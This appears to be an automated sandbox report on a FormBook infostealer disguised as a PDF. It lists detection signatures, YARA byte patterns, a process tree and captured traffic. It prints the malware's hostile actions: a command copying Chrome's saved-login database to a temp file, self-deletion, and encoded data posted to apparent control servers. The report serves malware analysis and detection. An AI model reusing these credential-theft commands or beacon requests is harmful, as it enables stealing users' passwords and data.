Play interactive tourEdit tour

# Analysis Report #Uc5f0#Uc554_190304,pdf.exe

## Overview

### General Information

 Sample Name: #Uc5f0#Uc554_190304,pdf.exe MD5: 5f42c48fa893d3787fbab422292c76c3 SHA1: d017e2ed84d8110bc6e1f8620715ede6da186cd9 SHA256: c67708cd06644c1fda26e6c0e4cfaaddf15634e8288ae451824c3083155a5192 Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality locales information (e.g. system language)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

### Classification

 System is w10x64#Uc5f0#Uc554_190304,pdf.exe (PID: 5324 cmdline: 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe' MD5: 5F42C48FA893D3787FBAB422292C76C3)#Uc5f0#Uc554_190304,pdf.exe (PID: 5160 cmdline: 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe' MD5: 5F42C48FA893D3787FBAB422292C76C3)explorer.exe (PID: 2864 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)chkdsk.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)cmd.exe (PID: 5328 cmdline: /c del 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cmd.exe (PID: 604 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)e2kdixix4hi0i2.exe (PID: 936 cmdline: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe MD5: 5F42C48FA893D3787FBAB422292C76C3)e2kdixix4hi0i2.exe (PID: 4988 cmdline: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe MD5: 5F42C48FA893D3787FBAB422292C76C3)NETSTAT.EXE (PID: 1512 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18449:\$sqlite3step: 68 34 1C 7B E1
• 0x1855c:\$sqlite3step: 68 34 1C 7B E1
• 0x18478:\$sqlite3text: 68 38 2A 90 C5
• 0x1859d:\$sqlite3text: 68 38 2A 90 C5
• 0x1848b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x185b3:\$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98b8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b32:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x157c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x152b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x158c7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x15a3f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa6ba:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1452c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb3b3:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1ab37:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1bb3a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18449:\$sqlite3step: 68 34 1C 7B E1
• 0x1855c:\$sqlite3step: 68 34 1C 7B E1
• 0x18478:\$sqlite3text: 68 38 2A 90 C5
• 0x1859d:\$sqlite3text: 68 38 2A 90 C5
• 0x1848b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x185b3:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 43 entries
SourceRuleDescriptionAuthorStrings
0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x17649:\$sqlite3step: 68 34 1C 7B E1
• 0x1775c:\$sqlite3step: 68 34 1C 7B E1
• 0x17678:\$sqlite3text: 68 38 2A 90 C5
• 0x1779d:\$sqlite3text: 68 38 2A 90 C5
• 0x1768b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x177b3:\$sqlite3blob: 68 53 D8 7F 8C
0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8ab8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d32:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x149c5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x144b1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14ac7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14c3f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x98ba:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1372c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa5b3:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19d37:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ad3a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18449:\$sqlite3step: 68 34 1C 7B E1
• 0x1855c:\$sqlite3step: 68 34 1C 7B E1
• 0x18478:\$sqlite3text: 68 38 2A 90 C5
• 0x1859d:\$sqlite3text: 68 38 2A 90 C5
• 0x1848b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x185b3:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 43 entries

## Sigma Overview

### System Summary:

 Source: Process started Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\chkdsk.exe, ParentImage: C:\Windows\SysWOW64\chkdsk.exe, ParentProcessId: 4804, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 604
 Sigma detected: File Created with System Process Name Show sources
 Source: File created Author: Sander Wiebing: Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 2864, TargetFilename: C:\Users\user\AppData\Local\Temp\Lp4ml

## Signature Overview

### AV Detection:

 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Lp4ml\e2kdixix4hi0i2.exe Virustotal: Detection: 30% Perma Link
 Multi AV Scanner detection for submitted file Show sources
 Source: #Uc5f0#Uc554_190304,pdf.exe Virustotal: Detection: 30% Perma Link
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE
 Machine Learning detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Lp4ml\e2kdixix4hi0i2.exe Joe Sandbox ML: detected
 Machine Learning detection for sample Show sources
 Source: #Uc5f0#Uc554_190304,pdf.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

 Contains functionality to enumerate / list files inside a directory Show sources
 Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe Code function: 0_2_004083DC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_004083DC Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe Code function: 0_2_00405088 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405088

 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe Code function: 4x nop then push 004659A0h 0_2_0045E23C Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe Code function: 4x nop then push 00000000h 0_2_0045E23C Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe Code function: 4x nop then call 00406074h 0_2_004659F4 Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe Code function: 4x nop then push 00000000h 0_2_004659F4

### Networking:

 Uses netstat to query active network connections and open ports Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH+oaVijRcBtEnjxc5iWZQM7UUOD057V&S2=vzrtEjS8dTOt0 HTTP/1.1Host: www.sweetandsunny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /6dk/?4hG=pg/jUtKomc/L4vhxH/kMeK3wbZstWx/FEKb2uJAMbWIhCvL1z2faZ29JSnFivOU2cy63&S2=vzrtEjS8dTOt0 HTTP/1.1Host: www.elizavetakalinina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /6dk/ HTTP/1.1Host: www.elizavetakalinina.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.elizavetakalinina.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.elizavetakalinina.com/6dk/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 47 3d 68 43 7a 5a 4b 4e 28 49 36 70 6d 39 74 4e 6b 6b 52 4a 4a 48 50 61 62 54 4e 62 51 65 56 31 6e 35 59 5f 4b 4a 39 70 38 79 54 47 55 64 4f 37 4b 75 36 54 65 66 62 7a 51 32 50 6b 39 70 68 65 34 36 55 52 33 6e 57 55 30 4c 67 68 47 4c 5a 6e 7a 41 45 35 67 55 44 6e 47 6b 74 73 53 48 50 41 51 4e 69 31 6b 6a 78 6d 75 5a 73 75 7a 75 6e 51 53 67 4e 61 44 67 62 44 33 39 71 4d 48 72 51 51 6a 2d 67 4b 7a 56 30 6b 6b 31 30 50 61 7a 39 36 79 62 6e 4c 39 7a 68 62 76 32 35 73 66 72 34 2d 56 49 38 73 71 39 4b 71 65 52 42 6b 35 41 41 56 72 43 6c 68 5a 42 53 5f 28 5f 48 76 32 4b 4a 4a 4b 68 52 79 59 58 65 50 69 51 59 72 51 51 44 4a 51 6b 66 5a 30 37 63 73 55 35 36 44 50 79 75 62 31 68 4d 71 74 47 47 39 4e 72 6f 53 55 57 4d 6d 38 52 38 7a 54 4e 63 69 79 4a 6b 67 58 53 6d 75 47 35 4f 32 77 65 6f 55 4a 31 6e 57 35 56 59 63 6b 73 32 54 30 36 66 35 43 68 49 78 50 74 78 47 4b 74 6a 31 66 68 62 70 44 37 4f 7a 45 4b 72 32 6a 63 69 63 4d 39 4c 38 4d 57 4f 64 4e 4c 4f 70 43 53 54 49 47 4b 6f 6f 7a 44 6f 78 55 33 75 4f 31 59 6a 59 48 56 34 33 35 57 7e 47 59 79 4d 30 39 7a 44 54 45 76 42 68 73 64 48 55 6a 4d 6f 70 6a 6a 59 47 74 59 63 6e 38 37 6b 55 59 54 70 54 70 50 36 47 50 69 47 79 6d 5f 77 49 74 4d 6e 45 46 41 73 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hG=hCzZKN(I6pm9tNkkRJJHPabTNbQeV1n5Y_KJ9p8yTGUdO7Ku6TefbzQ2Pk9phe46UR3nWU0LghGLZnzAE5gUDnGktsSHPAQNi1kjxmuZsuzunQSgNaDgbD39qMHrQQj-gKzV0kk10Paz96ybnL9zhbv25sfr4-VI8sq9KqeRBk5AAVrClhZBS_(_Hv2KJJKhRyYXePiQYrQQDJQkfZ07csU56DPyub1hMqtGG9NroSUWMm8R8zTNciyJkgXSmuG5O2weoUJ1nW5VYcks2T06f5ChIxPtxGKtj1fhbpD7OzEKr2jcicM9L8MWOdNLOpCSTIGKoozDoxU3uO1YjYHV435W~GYyM09zDTEvBhsdHUjMopjjYGtYcn87kUYTpTpP6GPiGym_wItMnEFAsQ). Source: global traffic HTTP traffic detected: POST /6dk/ HTTP/1.1Host: www.elizavetakalinina.comConnection: closeContent-Length: 158229Cache-Control: no-cacheOrigin: http://www.elizavetakalinina.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.elizavetakalinina.com/6dk/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 47 3d 68 43 7a 5a 4b 4a 6a 36 38 4a 79 73 6e 63 49 76 51 61 34 4b 42 61 50 52 62 49 30 42 54 69 53 41 52 50 6d 6a 39 70 4d 75 49 56 63 31 4b 62 61 75 38 56 69 59 56 7a 51 78 4a 6b 39 71 6c 65 6b 47 58 44 33 5f 57 52 59 74 67 68 7e 45 41 52 66 50 45 70 67 44 42 48 37 66 76 73 47 41 50 44 6b 34 69 58 6f 37 36 47 53 5a 6f 65 72 67 37 69 37 79 4b 59 6e 76 46 6a 37 34 6e 73 75 74 51 67 50 76 67 6f 4f 79 69 77 38 7a 6c 4f 65 6b 67 4b 43 6a 78 38 42 67 74 72 72 78 38 76 6a 30 39 66 5a 4d 28 74 72 41 55 5f 6d 53 4c 30 42 4f 46 57 66 77 7a 6b 39 38 55 76 76 4e 48 73 48 5f 54 4b 65 30 56 30 64 61 62 36 4b 32 41 50 6f 53 4a 61 35 33 62 61 63 4b 50 39 45 47 31 68 57 75 6b 76 4e 34 4e 70 56 77 49 39 6b 64 71 6e 38 67 48 30 6b 35 73 55 44 46 65 69 43 32 74 43 33 42 7a 4e 4f 78 43 53 55 43 6c 55 49 52 68 57 35 5a 58 38 55 55 7a 68 5a 32 59 70 79 44 49 33 72 36 6d 46 65 4f 67 32 71 53 47 38 37 41 4e 48 42 46 6b 67 6d 6c 6e 4b 41 32 4d 4d 6f 59 54 74 4d 58 42 50 7e 4d 54 49 48 78 6f 70 7a 6c 70 41 41 33 76 63 4d 47 69 5f 72 6a 36 33 34 55 35 58 30 38 46 6b 77 6f 44 54 73 76 44 55 49 37 48 6e 7a 4d 35 6f 54 6b 59 6a 52 59 59 58 38 37 69 55 5a 6a 34 42 74 44 6c 33 6e 57 4f 6a 53 71 28 2d 34 38 6e 48 51 5a 37 56 48 35 69 4c 59 67 49 44 35 59 46 31 72 6d 46 52 68 75 68 79 58 78 45 72 73 70 78 46 6e 54 4f 69 4f 69 45 45 6f 6d 48 38 54 47 41 4b 75 72 72 53 65 31 70 41 6c 70 35 43 73 53 64 63 53 6e 51 47 58 58 41 35 35 70 7a 5a 32 5a 6d 33 77 6a 62 52 61 51 39 30 53 70 33 2d 73 32 69 53 74 50 74 79 34 5a 72 6c 52 6a 6a 72 48 6d 34 38 64 36 67 72 59 35 32 55 76 34 37 56 4c 78 43 4b 47 74 34 66 4e 5f 51 4f 64 31 46 61 6e 63 55 5a 74 66 56 6f 32 77 68 2d 51 6e 69 33 48 50 78 43 6d 6a 66 76 77 53 68 43 47 55 53 65 76 63 30 6e 4f 76 7e 43 67 66 4f 51 34 50 55 36 79 64 35 47 36 49 6d 31 48 63 5a 46 36 69 36 46 63 49 45 4f 30 46 58 55 6a 35 4d 51 62 30 72 6d 7e 53 62 4a 4c 4a 47 47 72 5f 30 61 4c 67 78 56 6d 31 4b 6b 6b 36 74 4f 68 61 6a 4c 36 39 53 30 4a 6b 64 46 37 42 50 64 28 55 78 6a 30 47 4a 55 4c 34 6b 66 64 57 78 58 42 62 4f 4f 30 41 43 48 72 5f 6a 57 42 49 76 6f 67 56 32 31 34 34 78 45 28 34 66 49 59 72 69 31 63 5f 53 61 62 74 77 42 42 6f 78 7a 6f 78 73 4b 36 30 30 62 6c 6c 46 37 56 53 48 77 38 75 53 4a 45 52 69 5f 52 72 63 51 64 66 6b 69 47 55 33 62 54 57 69 46 34 72 32 36 35 56 55 50 52 74 43 4d 47 6d 4e 57 37 41 6d 30 5a 71 6a 6a 71 4e 67 46 6a 61 6f 7a 30 78 71 57 54 63 5a 6b 49 47 62 57 4d 50 41 6e 45 77 7a 39 76 73 4d 2d 77 6c 48 73 6c 46 43 2d 4f 52 36 62 69 32 35 4f 62 36 6a 5a 6d 72 75 4c 45 42 37 37 52 66 58 46 71 5a 41 6b 7e 74 6c 7
 Source: global traffic HTTP traffic detected: GET /6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH+oaVijRcBtEnjxc5iWZQM7UUOD057V&S2=vzrtEjS8dTOt0 HTTP/1.1Host: www.sweetandsunny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /6dk/?4hG=pg/jUtKomc/L4vhxH/kMeK3wbZstWx/FEKb2uJAMbWIhCvL1z2faZ29JSnFivOU2cy63&S2=vzrtEjS8dTOt0 HTTP/1.1Host: www.elizavetakalinina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.caishenhou.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /6dk/ HTTP/1.1Host: www.elizavetakalinina.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.elizavetakalinina.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.elizavetakalinina.com/6dk/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 47 3d 68 43 7a 5a 4b 4e 28 49 36 70 6d 39 74 4e 6b 6b 52 4a 4a 48 50 61 62 54 4e 62 51 65 56 31 6e 35 59 5f 4b 4a 39 70 38 79 54 47 55 64 4f 37 4b 75 36 54 65 66 62 7a 51 32 50 6b 39 70 68 65 34 36 55 52 33 6e 57 55 30 4c 67 68 47 4c 5a 6e 7a 41 45 35 67 55 44 6e 47 6b 74 73 53 48 50 41 51 4e 69 31 6b 6a 78 6d 75 5a 73 75 7a 75 6e 51 53 67 4e 61 44 67 62 44 33 39 71 4d 48 72 51 51 6a 2d 67 4b 7a 56 30 6b 6b 31 30 50 61 7a 39 36 79 62 6e 4c 39 7a 68 62 76 32 35 73 66 72 34 2d 56 49 38 73 71 39 4b 71 65 52 42 6b 35 41 41 56 72 43 6c 68 5a 42 53 5f 28 5f 48 76 32 4b 4a 4a 4b 68 52 79 59 58 65 50 69 51 59 72 51 51 44 4a 51 6b 66 5a 30 37 63 73 55 35 36 44 50 79 75 62 31 68 4d 71 74 47 47 39 4e 72 6f 53 55 57 4d 6d 38 52 38 7a 54 4e 63 69 79 4a 6b 67 58 53 6d 75 47 35 4f 32 77 65 6f 55 4a 31 6e 57 35 56 59 63 6b 73 32 54 30 36 66 35 43 68 49 78 50 74 78 47 4b 74 6a 31 66 68 62 70 44 37 4f 7a 45 4b 72 32 6a 63 69 63 4d 39 4c 38 4d 57 4f 64 4e 4c 4f 70 43 53 54 49 47 4b 6f 6f 7a 44 6f 78 55 33 75 4f 31 59 6a 59 48 56 34 33 35 57 7e 47 59 79 4d 30 39 7a 44 54 45 76 42 68 73 64 48 55 6a 4d 6f 70 6a 6a 59 47 74 59 63 6e 38 37 6b 55 59 54 70 54 70 50 36 47 50 69 47 79 6d 5f 77 49 74 4d 6e 45 46 41 73 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hG=hCzZKN(I6pm9tNkkRJJHPabTNbQeV1n5Y_KJ9p8yTGUdO7Ku6TefbzQ2Pk9phe46UR3nWU0LghGLZnzAE5gUDnGktsSHPAQNi1kjxmuZsuzunQSgNaDgbD39qMHrQQj-gKzV0kk10Paz96ybnL9zhbv25sfr4-VI8sq9KqeRBk5AAVrClhZBS_(_Hv2KJJKhRyYXePiQYrQQDJQkfZ07csU56DPyub1hMqtGG9NroSUWMm8R8zTNciyJkgXSmuG5O2weoUJ1nW5VYcks2T06f5ChIxPtxGKtj1fhbpD7OzEKr2jcicM9L8MWOdNLOpCSTIGKoozDoxU3uO1YjYHV435W~GYyM09zDTEvBhsdHUjMopjjYGtYcn87kUYTpTpP6GPiGym_wItMnEFAsQ).
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: aruba-proxyDate: Thu, 28 May 2020 03:55:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingPragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: ; rel="https://api.w.org/"Set-Cookie: PHPSESSID=376rpn6oase94253u3k1ot3ka7; path=/Data Raw: 39 32 64 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 5f 73 74 72 65 74 63 68 65 64 20 72 65 73 70 6f 6e 73 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 61 76 2d 64 65 66 61 75 6c 74 2d 6c 69 67 68 74 62 6f 78 20 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 20 68 74 6d 6c 5f 6c 6f 67 6f 5f 63 65 6e 74 65 72 20 68 74 6d 6c 5f 62 6f 74 74 6f 6d 5f 6e 61 